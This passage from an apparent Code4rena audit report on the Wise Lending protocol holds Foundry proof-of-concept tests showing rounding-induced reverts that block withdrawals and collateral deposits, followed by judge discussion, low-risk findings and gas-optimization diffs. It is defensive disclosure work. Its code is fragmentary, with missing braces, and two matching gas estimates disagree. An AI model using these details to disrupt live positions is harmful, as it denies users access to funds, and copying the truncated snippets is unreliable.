Withdraw scenario:

Add the following test inside contracts/WisenLendingShutdown.t.sol and run via forge test --fork-url mainnet -vvvv --mt test_t0x1c_WithdrawRevert to see the test fail.

    function test_t0x1c_WithdrawRevert() 
        address bob = makeAddr("Bob");
        vm.deal(bob, 100 ether); // give some ETH to Bob

        uint256 nftId = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 10 ether}(nftId); 
        LENDING_INSTANCE.withdrawExactAmountETH(nftId, 9.1 ether); // @audit : Reverts incorrectly for all values greater than `9 ether`.

If you want to check with values which make the test pass, change the following line of the test case like shown below and run again:

-     LENDING_INSTANCE.withdrawExactAmountETH(nftId, 9.1 ether); // @audit : Reverts incorrectly for all values greater than `9 ether`.
+     LENDING_INSTANCE.withdrawExactAmountETH(nftId, 9 ether); // @audit : Reverts incorrectly for all values greater than `9 ether`.

This failure happened because the moment lendingPoolData[_poolToken].pseudoTotalPool and lendingPoolData[_poolToken].totalDepositShares go below 1 ether, their divergence is significant enough to result in lendSharePrice being calculated as greater than 1000000000000000000 or 1 ether:

  lendSharePrice = lendingPoolData[_poolToken].pseudoTotalPool * 1e18 / lendingPoolData[_poolToken].totalDepositShares

Which in this case, evaluates to 1000000000000000001. This brings us back to our root cause of failure. Due to the divergence, lendSharePrice of 1000000000000000001 has become greater than currentSharePriceMax of 1000000000000000000 and fails the validation on L234-L237 inside _compareSharePrices().

High likelihood, as it’s possible for a huge number of value combinations, as shown above.

If user is trying to save his collateral, this is High severity. Otherwise he can try later with modified values making it a Medium severity.

Tools Used


Since the reduction by 1 inside _calculateShares() is being done to round-down in favour of the protocol, removing that without a deeper analysis could prove to be risky as it may open up other attack vectors. Still, two points come to mind which can be explored:

  • Option1: Reducing lendingPoolData[_poolToken].pseudoTotalPool too would keep it in sync with lendingPoolData[_poolToken].totalDepositShares and will avoid the current issue.
  • Option2: Not reducing it by 1 seems to solve the immediate problem at hand (needs further impact analysis):
  File: contracts/MainHelper.sol

  33:               function _calculateShares(
  34:                   uint256 _product,
  35:                   uint256 _pseudo,
  36:                   bool _maxSharePrice
  37:               )
  38:                   private
  39:                   pure
  40:                   returns (uint256)
  41:               {
  42:                   return _maxSharePrice == true
  43:                       ? _product / _pseudo + 1
- 44:                       : _product / _pseudo - 1;
+ 44:                       : _product / _pseudo;
  45:               }

Assessed type


vm06007 (Wise Lending) commented:

If you remove -1 then it opens other attacks, so it is not justified suggestion. To qualify this for a finding I will let @vonMangoldt give his opinion for these details.

Trust (judge) decreased severity to Medium and commented:

High quality submission. Likelihood is Low/Med, Impact is Med/High, so Medium is appropriate.

t0x1c (warden) commented:

Likelihood is Low/Med

@Trust - Could you please expand on your reasoning behind this? As I mentioned in the report, the frequency/likelihood at which this happens currently is very high which I supported by various random examples.

To strengthen my case, here are additional example flows of events which cause a revert for Bob when he tries to save his collateral by depositing additional amount. I have even added more actors so that it can mimic a real world scenario even more closely than before.

I am also supplementing Scenario 1 and Scenario 2 (below) of the table with coded PoCs (very similar to the one I already provided in my report), just in case it helps to run it and see the scenario in action. Due to these reasons, I believe the vulnerability should qualify as a High. Requesting you to re-assess.

# Action1 Action2 Action3 Action4 Action5
Scenario 1 Alice deposits 2 ether Bob deposits 2 ether Carol deposits 1 ether Bob borrows 1 ether Bob deposits 0.5 ether (reverts)
Scenario 2 Alice deposits 2 ether Bob deposits 3 ether Carol deposits 2.5 ether Bob borrows 2 ether Bob deposits 1 ether (reverts)
    function test_t0x1c_MultipleDepositsCombinations_Revert_With_Borrow_Scenario1() 
        address alice = makeAddr("Alice");
        address bob = makeAddr("Bob");
        address carol = makeAddr("Carol");
        vm.deal(alice, 10 ether); 
        vm.deal(bob, 10 ether); 
        vm.deal(carol, 10 ether); 

        uint256 nftId = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 2 ether}(nftId); 

        uint256 nftId_Bob = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 2 ether}(nftId_Bob); 
        nftId = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 1 ether}(nftId); 
        LENDING_INSTANCE.borrowExactAmountETH(nftId_Bob, 1 ether);

        LENDING_INSTANCE.depositExactAmountETH{value: 0.5 ether}(nftId_Bob); // @audit : REVERTS incorrectly; Bob can't deposit additional collateral to save himself


    function test_t0x1c_MultipleDepositsCombinations_Revert_With_Borrow_Scenario2() 
        address alice = makeAddr("Alice");
        address bob = makeAddr("Bob");
        address carol = makeAddr("Carol");
        vm.deal(alice, 10 ether); 
        vm.deal(bob, 20 ether); 
        vm.deal(carol, 10 ether); 

        uint256 nftId = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 2 ether}(nftId); 

        uint256 nftId_Bob = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 3 ether}(nftId_Bob); 
        nftId = POSITION_NFTS_INSTANCE.mintPosition(); 
        LENDING_INSTANCE.depositExactAmountETH{value: 2.5 ether}(nftId); 

        LENDING_INSTANCE.borrowExactAmountETH(nftId_Bob, 2 ether);

        LENDING_INSTANCE.depositExactAmountETH{value: 1 ether}(nftId_Bob); // @audit : REVERTS incorrectly; Bob can't deposit additional collateral to save himself

Trust (judge) commented:

There is a huge number of combinations which would cause a revert, but considering the vast space of uint256 that number is actually small. Eventually, the issue is called by a rounding which is off by one, and is easily fixed in a repeat transaction. High would be an overstatement.

Wise Lending commented:

Mitigated here.

Low Risk and Non-Critical Issues

For this audit, 7 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by Dup1337 received the top score from the judge.

The following wardens also submitted reports: cheatc0d3, nonseodion, 0x11singh99, serial-coder, shealtielanz, and NentoR.

ID Issue
[01] Wrong fee amount check doesn’t protect against extensive fees
[02] Allowed spread check allows for smaller spread than expected
[03] No validation of token being removed has shares
[04] Opening nonleveraged position in pendle PowerFarm is impossible
[05] Adding too much Pendle markets DoSes Pendle PowerFarm
[06] Borrow APY calculations don’t account for utilization rate
[07] Possible DoSing of Pendle farm via overflow
[08] exitFarm doesn´t default the isAave flag

[01] Wrong fee amount check doesn’t protect against extensive fees

Function PendlePowerFarmToken.depositExactAmount() checks if position mint fee is not too big by reverting with TooMuchFee() error, if reducedShares == feeShares evaluates to true. This check is not sufficient, because if feeShares are bigger than reducedShares, the condition will succeed. Hence, the protection is not sufficient to protect against too big fee.

    function depositExactAmount(
        uint256 reducedShares = _applyMintFee(

        uint256 feeShares = shares
            - reducedShares;

        if (feeShares == 0) {
            revert ZeroFee();

        if (reducedShares == feeShares) { // @audit it doesn't concern case when feeShares > reducedShares
            revert TooMuchFee();

The check should be changed to if (reducedShares <= feeShares).

[02] Allowed spread check allows for smaller spread than expected

Allowed spread check allows for smaller spread than expected, because spread percentage is calculated from value after swaps, not before.

        uint256 ethValueBefore = _getTokensInETH(

            uint256 receivedShares
        ) = IPendleChild(PENDLE_CHILD).depositExactAmount(

        uint256 ethValueAfter = _getTokensInETH( 
            * _allowedSpread // @audit spread is calculated from diminished value
            / PRECISION_FACTOR_E18;

        if (ethValueAfter < ethValueBefore) {
            revert TooMuchValueLost();

So, the check is actually if value ETH after * _allowedSpread >= deposit ETH value. However, the calculation checks if the spread is actually lower than set by user, because the slippage is applied to already diminished value. For example, let’s say that user passes the following:

depositAmount = 100
allowedSlippage = 105e16 (5%)

So slippage down to 95 should be accepted. However, due to the flipped calculations, the slippage check would look like 95 * 105% < 100 => 99.75 < 100 and would revert, even though it should be accepted.

[03] No validation of token being removed has shares

The manual remove function doesn’t validate whether the pool being removed has shares. It can organically have shares during the removal either by TX order or already the share is there.

Contract: FeeManager.sol

438:     function removePoolTokenManual(
439:         address _poolToken
440:     )
441:         external
442:         onlyMaster
443:     {
444:         uint256 i;
445:         uint256 len = getPoolTokenAddressesLength();
446:         uint256 lastEntry = len - 1;
447:         bool found;
449:         if (poolTokenAdded[_poolToken] == false) {
450:             revert PoolNotPresent();
451:         }
453:         while (i < len) {
455:             if (_poolToken != poolTokenAddresses[i]) {
457:                 unchecked {
458:                     ++i;
459:                 }
461:                 continue;
462:             }
464:             found = true;
466:             if (i != lastEntry) {
467:                 poolTokenAddresses[i] = poolTokenAddresses[lastEntry];
468:             }
470:             break;
471:         }
473:         if (found == true) {
475:             poolTokenAddresses.pop();
476:             poolTokenAdded[_poolToken] = false;
478:             emit PoolTokenRemoved(
479:                 _poolToken,
480:                 block.timestamp
481:             );
483:             return;
484:         }
486:         revert PoolNotPresent();
487:     }

[04] Opening nonleveraged position in pendle PowerFarm is impossible

If user wants to have <100% exposure it will revert, in case if 1x leverage flash will be 0 and balancer will revert too.

Contract: PendlePowerFarm.sol

185:     function _openPosition(
186:         bool _isAave,
187:         uint256 _nftId,
188:         uint256 _initialAmount,
189:         uint256 _leverage,
190:         uint256 _allowedSpread
191:     )
192:         internal
193:     {
194:         if (_leverage > MAX_LEVERAGE) {
195:             revert LeverageTooHigh();
196:         }
198:         uint256 leveragedAmount = getLeverageAmount(
199:             _initialAmount,
200:             _leverage
201:         );
203:         if (_notBelowMinDepositAmount(leveragedAmount) == false) {
204:             revert AmountTooSmall();
205:         }
207:         _executeBalancerFlashLoan(
208:             {
209:                 _nftId: _nftId,
210:                 _flashAmount: leveragedAmount - _initialAmount, // @audit if user wants to have <100% exposure it will revert, in case if 1x leverage flash will be 0 and balancer will revert too
211:                 _initialAmount: _initialAmount,
212:                 _lendingShares: 0,
213:                 _borrowShares: 0,
214:                 _allowedSpread: _allowedSpread,
215:                 _ethBack: false,
216:                 _isAave: _isAave
217:             }
218:         );
219:     }

[05] Adding too much Pendle markets DoSes Pendle PowerFarm

There is no constraint on how many pendle markets can be added:

    function addPendleMarket(
        address _pendleMarket,
        string memory _tokenName,
        string memory _symbolName,
        uint16 _maxCardinality
// [...]
// [...]

Adding too much doses syncing supply:

    function syncAllSupply()
        uint256 i;
        uint256 length = activePendleMarkets.length;

        while (i < length) {
            unchecked {

[06] Borrow APY calculations don’t account for utilization rate

There are 2 functions calculating APY: one calculates borrow APY, one lending APY. So, generally both should yield similar results, that is lending APY - protocol fees ~= borrowing APY. However, lending APY includes utilization rate of the pool and APY is adjusted over it, while borrowing APY doesn’t account for it, leading to borrowing APY assuming utilization rate is always 100%.

    function overallLendingAPY(
        uint256 _nftId
        returns (uint256)
            weightedRate += ethValue
                * getLendingRate(token);

            overallETH += ethValue;

            unchecked {

        return weightedRate
            / overallETH;

and lendingRate() function:

        address _poolToken
        returns (uint256)
        uint256 pseudoTotalPool = WISE_LENDING.getPseudoTotalPool(

        if (pseudoTotalPool == 0) {
            return 0;

        uint256 adjustedRate = getBorrowRate(_poolToken)
            * (PRECISION_FACTOR_E18 - WISE_LENDING.globalPoolData(_poolToken).poolFee)
            / PRECISION_FACTOR_E18;

        return adjustedRate // @audit pool utilization rate is taken into account
            * WISE_LENDING.getPseudoTotalBorrowAmount(_poolToken)
            / pseudoTotalPool;

In comparison, borrow APY is calculated as follows:

    function overallBorrowAPY(
        uint256 _nftId
        returns (uint256)
        // [...]

            weightedRate += ethValue
                * getBorrowRate(token); // @audit borrow rate is WISE_LENDING.borrowPoolData(_poolToken).borrowRate storage variable

            overallETH += ethValue;

            unchecked {

        return weightedRate
            / overallETH;

So borrow APY doesn’t account for utilization rate as lending APY. So it shows that you’ll have to pay high fees for borrowing, and you’ll get proportionally less for providing value to the protocol.

There is actually yet another function, combining the two above, overallNetAPY(), which calculates both lending and borrowing APY, and returns the value combined.

Both functions are not used by the protocol, but it might false information to either offchain clients or external protocols integrating with WiseLending.

Additional thing to consider is that Pendle markets can be only added; there is no function to remove them.

[07] Possible DoSing of Pendle farm via overflow

There are 3 multiplications of big numbers before first division in PendleChildLpOracle:

function latestAnswer()
        returns (uint256)
        return priceFeedPendleLpOracle.latestAnswer()
            * pendleChildToken.totalLpAssets()
            * PRECISION_FACTOR_E18
            / pendleChildToken.totalSupply()
            / PRECISION_FACTOR_E18;

When I put some numbers, we still have a space to grow:

> 2**256 / (1e18*1000000e18*1e18)

But either way, the protocol still can use MathLib.MulDiv that handles intermediate overflow gracefully in case of black swan events.

[08] exitFarm doesn´t default the isAave flag

When the exitFarm is called:

  1. The Power Farm NFT is burned,
  2. Reserved keys are reset,
  3. And available NFT mapping is reserved for the burned one.

However, it doesn’t revert the isAave mapping to false:

Contract: PendlePowerManager.sol

210:     function exitFarm(
211:         uint256 _keyId,
212:         uint256 _allowedSpread,
213:         bool _ethBack 
214:     )
215:         external
216:         updatePools
217:         onlyKeyOwner(_keyId)
218:     {
219:         uint256 wiseLendingNFT = farmingKeys[
220:             _keyId
221:         ];
223:         delete farmingKeys[
224:             _keyId
225:         ];
227:         if (reservedKeys[msg.sender] == _keyId) {
228:             reservedKeys[msg.sender] = 0;
229:         } else {
230:             FARMS_NFTS.burnKey(
231:                 _keyId
232:             );
233:         }
235:         availableNFTs[
236:             ++availableNFTCount
237:         ] = wiseLendingNFT;
239:         _closingPosition(
240:             isAave[_keyId],//@audit if this remains as True, it will remain true
241:             wiseLendingNFT,
242:             _allowedSpread,
243:             _ethBack
244:         );
246:         emit FarmExit(
247:             _keyId,
248:             wiseLendingNFT,
249:             _allowedSpread,
250:             block.timestamp
251:         );
252:     }

Trust (judge) commented:

[02] - not necessarily valid, it depends on sponsor’s interpretation of slippage value.
[04] - NC severity.
[05] - belongs to analysis report because it is a centralization risk.

Gas Optimizations

For this audit, 6 reports were submitted by wardens detailing gas optimizations. The report highlighted below by 0xAnah received the top score from the judge.

The following wardens also submitted reports: 0x11singh99, dharma09, K42, 0xhacksmithh, and albahaca.

Highlighted below are optimizations exclusively targeting state-mutating functions and view/pure functions invoked by state-mutating functions. In the discussion that follows, only runtime gas is emphasized, given its inevitable dominance over deployment gas costs throughout the protocol’s lifetime.

Please be aware that some code snippets may be shortened to conserve space, and certain code snippets may include @audit tags in comments to facilitate issue explanations.

[G-01] Refactor PendlePowerFarmController.increaseReservedForCompound() function to avoid unnecessary copying from storage to memory and vice-versa


The PendlePowerFarmController.increaseReservedForCompound() function can be refactored to be better gas efficient by avoiding unnecessary copying of values from storage to memory updating the values then copying back to storage. Having to copy from the storage variable pendleChildCompoundInfo[_pendleMarket] into a memory variable childInfo would mean that every storage slot of pendleChildCompoundInfo[_pendleMarket] would be read (even those not needed in the function); which would cost 2100 gas units for every slot read. Then, it has to update the memory variable in the while loop before copying the memory variable into the storage is absolutely gas inefficient.

We can rectify this by making the childInfo variable a storage variable, doing this would avoid having copy values from storage to memory since the it is passed by reference also there would be absolutely no need to copy from memory back to storage. The diff below shows how the code should be refactored:

file: contracts/PowerFarms/PendlePowerFarmController/PendlePowerFarmController.sol

497:    function increaseReservedForCompound(
498:        address _pendleMarket,
499:        uint256[] calldata _amounts
500:    )
501:        external
502:        onlyChildContract(_pendleMarket)
503:    {
504:        CompoundStruct memory childInfo = pendleChildCompoundInfo[
505:            _pendleMarket
506:        ];
508:        uint256 i;
509:        uint256 length = childInfo.rewardTokens.length;
511:        while (i < length) {
512:            childInfo.reservedForCompound[i] += _amounts[i];
513:            unchecked {
514:                ++i;
515:            }
516:        }
518:        pendleChildCompoundInfo[_pendleMarket] = childInfo;
520:        emit IncreaseReservedForCompound(
521:            _pendleMarket,
522:            _amounts
523:        );
524:    }
diff --git a/contracts/PowerFarms/PendlePowerFarmController/PendlePowerFarmController.sol b/contracts/PowerFarms/PendlePowerFarmController/PendlePowerFarmController.solindex 15cb863..842b94e 100644
--- a/contracts/PowerFarms/PendlePowerFarmController/PendlePowerFarmController.sol
+++ b/contracts/PowerFarms/PendlePowerFarmController/PendlePowerFarmController.sol
@@ -501,7 +501,7 @@ contract PendlePowerFarmController is PendlePowerFarmControllerHelper {
-        CompoundStruct memory childInfo = pendleChildCompoundInfo[
+        CompoundStruct storage childInfo = pendleChildCompoundInfo[

@@ -515,8 +515,6 @@ contract PendlePowerFarmController is PendlePowerFarmControllerHelper {

-        pendleChildCompoundInfo[_pendleMarket] = childInfo;
         emit IncreaseReservedForCompound(

Estimated gas saved: 13672 gas units.

[G-02] Avoid Reading and writing to state if the value is zero

Instance 1:

Refactor FeeManager.increaseIncentiveA() to avoid reading or writing to state if _value is 0.


In the FeeManager.increaseIncentiveA() function as shown below checks should be implemented to avoid reading and writing to state if the _value argument is zero this is because in scenarios where _value is 0 the statement incentiveUSD[incentiveOwnerA] += _value would not in any way change the value of incentiveUSD[incentiveOwnerA] since it is being incremented by 0. This means that in scenarios where _value_ is 0 the statement incentiveUSD[incentiveOwnerA] += _value is re-assigning the same value to state; i.e. there is no state change.

file: contracts/FeeManager/FeeManager.sol

214:    function increaseIncentiveA(
215:        uint256 _value
216:    )
217:        external
218:        onlyIncentiveMaster
219:    {
220:        incentiveUSD[incentiveOwnerA] += _value;   // @audit implement zero checks
222:        emit IncentiveIncreasedA(
223:            _value,
224:            block.timestamp
225:        );
226:    }
diff --git a/contracts/FeeManager/FeeManager.sol b/contracts/FeeManager/FeeManager.sol
index f176113..4515083 100644
--- a/contracts/FeeManager/FeeManager.sol
+++ b/contracts/FeeManager/FeeManager.sol
@@ -24,6 +24,7 @@ import "./FeeManagerHelper.sol";

 contract FeeManager is FeeManagerHelper {

+    error ZeroValue();
         address _master,
         address _aaveAddress,
@@ -217,6 +218,9 @@ contract FeeManager is FeeManagerHelper {
+        if(_value == 0) {
+            revert ZeroValue();
+        }
         incentiveUSD[incentiveOwnerA] += _value;

Estimated gas saved: 50000 gas units.

Instance 2:

Refactor FeeManager.increaseIncentiveB() to avoid reading or writing to state if _value is 0.


In the FeeManager.increaseIncentiveB() function as shown below checks should be implemented to avoid reading and writing to state if the _value argument is zero this is because in scenarios where _value is 0 the statement incentiveUSD[incentiveOwnerB] += _value would not in any way change the value of incentiveUSD[incentiveOwnerB] since it is being incremented by 0. This means that in scenarios where _value is 0 the statement incentiveUSD[incentiveOwnerB] += _value is re-assigning the same value to state; i.e. there is no state change.

file: contracts/FeeManager/FeeManager.sol

232:    function increaseIncentiveB(
233:        uint256 _value
234:    )
235:        external
236:        onlyIncentiveMaster
237:    {
238:        incentiveUSD[incentiveOwnerB] += _value;   // @audit implement zero checks
240:        emit IncentiveIncreasedB(
241:            _value,
242:            block.timestamp
243:        );
244:    }
diff --git a/contracts/FeeManager/FeeManager.sol b/contracts/FeeManager/FeeManager.sol
index f176113..79f4dc6 100644
--- a/contracts/FeeManager/FeeManager.sol
+++ b/contracts/FeeManager/FeeManager.sol
@@ -24,6 +24,7 @@ import "./FeeManagerHelper.sol";

 contract FeeManager is FeeManagerHelper {

+    error ZeroValue();
         address _master,
         address _aaveAddress,
@@ -234,7 +235,10 @@ contract FeeManager is FeeManagerHelper {
-    {
+    {
+        if(_value == 0) {
+            revert ZeroValue();
+        }
         incentiveUSD[incentiveOwnerB] += _value;

         emit IncentiveIncreasedB(

Estimated gas saved: 5000 gas units.